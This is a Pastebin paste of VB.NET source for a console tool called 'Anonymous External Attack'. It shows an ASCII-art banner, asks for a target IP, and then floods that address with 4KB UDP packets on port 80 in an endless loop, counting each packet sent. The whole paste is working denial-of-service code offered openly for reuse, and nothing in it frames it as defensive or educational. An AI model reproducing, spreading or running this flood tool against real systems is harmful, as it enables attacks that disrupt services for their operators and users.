Anonim_ID

Anonymous External Attack Source Code

Jul 10th, 2013
1,581
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
VB.NET 5.06 KB | None | 0 0
  1. Imports System.Net, System.Net.Sockets
  2. 'Remember to give credits if you use this source!
  3. 'Leak by Anon?M ID
  4. Module Module1
  5.     Sub Main()
  6.         Dim IP As String
  7.         Dim Port As Integer = 80
  8.         Dim sentt As Integer
  9.         Dim synthesizer = CreateObject("SAPI.spvoice")
  10.         Console.SetWindowSize(50, 50)
  11.         Console.Title = "Anonymous External Attack - 1.0"
  12.         Console.ForegroundColor = ConsoleColor.DarkGreen
  13.         Console.WriteLine(".         . . ... .,~?I777?=,. . ... . . ")
  14.         Console.WriteLine("           .... :+ZO$I?I??I$OOI~.  .  .  ")
  15.         Console.WriteLine("        . ..  :7OI~....  .. .~IOZ+. .. .")
  16.         Console.WriteLine("        ... ,7O+..   .......  ..=O$: .   ")
  17.         Console.WriteLine("        ... ,7O+..   .......  ..=O$: .   ")
  18.         Console.WriteLine("     ...  .~OI    ......   ....  .?D= . ...  ")
  19.         Console.WriteLine("     .....+O~ ....      .     ..   :87...... ")
  20.         Console.WriteLine("     ... ?O... .. ... .... ...  ...  O$.....  ")
  21.         Console.WriteLine("     ...+O....... ..,,,,:,,,.. .. ....O7.....   ")
  22.         Console.WriteLine(" .  .  ~O,  .+...,,,,,,,,,,,,,, ..=, . 8? .. .. ")
  23.         Console.WriteLine("   . ..Z~..=NI..,, ...,.,. ,: ,:. +M?..:8~ .   .")
  24.         Console.WriteLine(". ..  I7.=?MZ..:,,..., .. , .,.,,..7MI? IZ.. . .")
  25.         Console.WriteLine(". .. :O IZ88, ,...:,.,,=I~.,,:,. :..ZN$$ O+ ... ")
  26.         Console.WriteLine(" ... 7+.D$7I:,, .,..,,?$7D., .,...,,II$N,=O . . ")
  27.         Console.WriteLine(" .  ,Z:ID=OZ.,. ...., ,:$7 ,..,,  ,,I8~87:O~.  .")
  28.         Console.WriteLine(". . +II$88Z,.,..,.. ,. ,+ ...  :.,.,.$D8$7?$....")
  29.         Console.WriteLine(". . $~O7NZ=.,  ,,,.,:,.::..:,,:,,....~7M78:8  . ")
  30.         Console.WriteLine("  ..$,D$?O?.,  ., .,,:.7O ,,,..... ..+OI7N.O~. . ")
  31.         Console.WriteLine(".. :$ D7$N., ..,.. ., .::. ..  .,..., 88?M.7? ..")
  32.         Console.WriteLine(". .=7=8NM~.,   . . ,,. .. .., ..,. .,.:DN8+7I.. ")
  33.         Console.WriteLine(" . +I7$M??., ,.,......,IZ:,.,.. ,..., ?+M$$I$ ..")
  34.         Console.WriteLine(".. ??O7$$7 ,,..,, .,+D.+7.OI...,:,....?$$I8?$ ..")
  35.         Console.WriteLine(". .?+$8=M+.,.  , ?$DMO.=? 7M8I+,,. ., :M+$8+$. .")
  36.         Console.WriteLine(" . ??~MIM. , ...~MMMMO ~? $MMMMZ.   ..,D7N++Z  .")
  37.         Console.WriteLine("   =7:8MZ?.,. . ?MMMM8 ?8 ZMMMMD, ..,.=$NN~II . ")
  38.         Console.WriteLine(" . ~$I+MIO:...  ZMMMMM.ID NMMMMN,. .,.O?M?IZ+ . ")
  39.         Console.WriteLine(". ..7$$I7D~.,..,OMMMMM=ID=MMMMMM:..,.,N7I7$Z~ ..")
  40.         Console.WriteLine(" . .7+M$=M+ ,,. NMMMMMOZNZMMMMMM~.., =M?IM?O... ")
  41.         Console.WriteLine(". . ???M7D$+ , ~MMMMMMMNMMMMMMMM? ,.=7NIM$?$ .. ")
  42.         Console.WriteLine(".  .,Z:OMM7O:..+MMMMMMMMMMMMMMMM?.,.OIMM8:Z= .  ")
  43.         Console.WriteLine(" .. .7?7IN$O7 .?MMMMMMMMMMMMMMMM$. ?87MIIIZ.... ")
  44.         Console.WriteLine(". .. ,$IN7+IN:.IMMMMMMMMMMMMMMMM$.,D$+7D7$+ . ..")
  45.         Console.WriteLine(".  ...7?7MD?N7?7MMMMMMMMMMMMMMMMZ?7N?OMZ+O.. .  ")
  46.         Console.WriteLine(". . . .O:+NMNNZNMMMMMMMMMMMMMMMMMZ8MNNI,D~ . . .")
  47.         Console.WriteLine(" .  .. ~Z:7IIZ+$MMMMMMMMMMMMMMMMZ=OI?$:O?. . . .")
  48.         Console.WriteLine(" . . .. ?Z+D8OZZMMMMMMMMMMMMMMMMZOZON+7$, ..  . ")
  49.         Console.WriteLine(" . .  . .?$,$8OZ?+NMMMMMMMMMMO+?ZZ8$,7Z. ...  . ")
  50.         Console.WriteLine(".   ..  ..+O,+?+$NMMMMMMMMMMMMNZ?+?:Z$  ..    . ")
  51.         Console.WriteLine("  . ..  . .~8I78NDMMMMMMMMMMMDOMD$ID+ .. .  .  ")
  52.         Console.WriteLine("  .   .. ,. ,7$= =MMMMMMMMMMMO .~$O:.... ....   ")
  53.         Console.WriteLine(". ... .  . . .:$ZOMMMMMMMMMMMD?OO+ .. . .    . .")
  54.         Console.WriteLine(". . . .O:+NMNNZNMMMMMMMMMMMMMMMMMZ8MNNI,D~ . . .")
  55.         Console.WriteLine(". .. . ..   .. .:IZNMMMMMMMMNO$~.. .. .  . .. ..")
  56.         Console.WriteLine("-------------------------------------------------")
  57.         synthesizer.Speak("     Welcome to the anonymous external attack         ")
  58.         Console.WriteLine("     Welcome to the anonymous external attack")
  59.         Console.WriteLine("-------------------------------------------------")
  60.         Console.Write("Target IP : ")
  61.         IP = Console.ReadLine
  62.         Dim remoteEP As New IPEndPoint(IPAddress.Parse(IP), Port)
  63.         Dim buffer As Byte() = New Byte(&H1000 - 1) {}
  64.         Dim socket As New Socket(AddressFamily.InterNetwork, SocketType.Dgram, ProtocolType.Udp)
  65.         Console.WriteLine("****************************************************************************")
  66.         Console.WriteLine(String.Concat(New Object() {"Attacking to : ", IP, ":", Port, " - ", DateTime.Now.ToString("MM/dd/yyyy h:mm tt")}))
  67.         Console.WriteLine("****************************************************************************")
  68.         Console.WriteLine("Press Any Key To Continue...")
  69.         synthesizer.Speak("Target has been locked, press any key to execute the attack.")
  70.         Console.ReadLine()
  71.         Do While True
  72.             sentt += 1
  73.             Console.WriteLine(("Sent : " & sentt & " Packets"))
  74.             socket.SendTo(buffer, remoteEP)
  75.             Threading.Thread.Sleep(&H2D)
  76.         Loop
  77.     End Sub
  78.  
  79. End Module
Add Comment
Please, Sign In to add comment